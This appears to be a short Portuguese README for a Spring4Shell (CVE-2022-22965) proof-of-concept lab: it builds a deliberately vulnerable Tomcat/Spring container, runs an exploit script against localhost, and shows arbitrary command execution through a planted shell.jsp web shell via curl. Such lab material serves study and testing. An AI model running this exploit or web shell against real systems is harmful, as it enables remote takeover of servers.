
PoC e exploit para CVE-2022-22965 Spring4Shell
Spring4Shell (CVE-2022-22965) Prova de Conceito com um servidor Tomcat vulnerável e uma aplicação spring4shell vulnerável.
docker build . -t spring4shell
docker run -p 80:8080 spring4shell
Você também pode executá-lo com a porta do depurador exposta, se necessário:
docker run -p 80:8080 –p 5005:5005 spring4shell
Consulte a publicação original do blog para obter detalhes sobre como configurar um depurador remoto no IntelliJ Idea!
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell
Depois, você pode executar qualquer comando remotamente assim:
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -
...ou visitando a URL acima.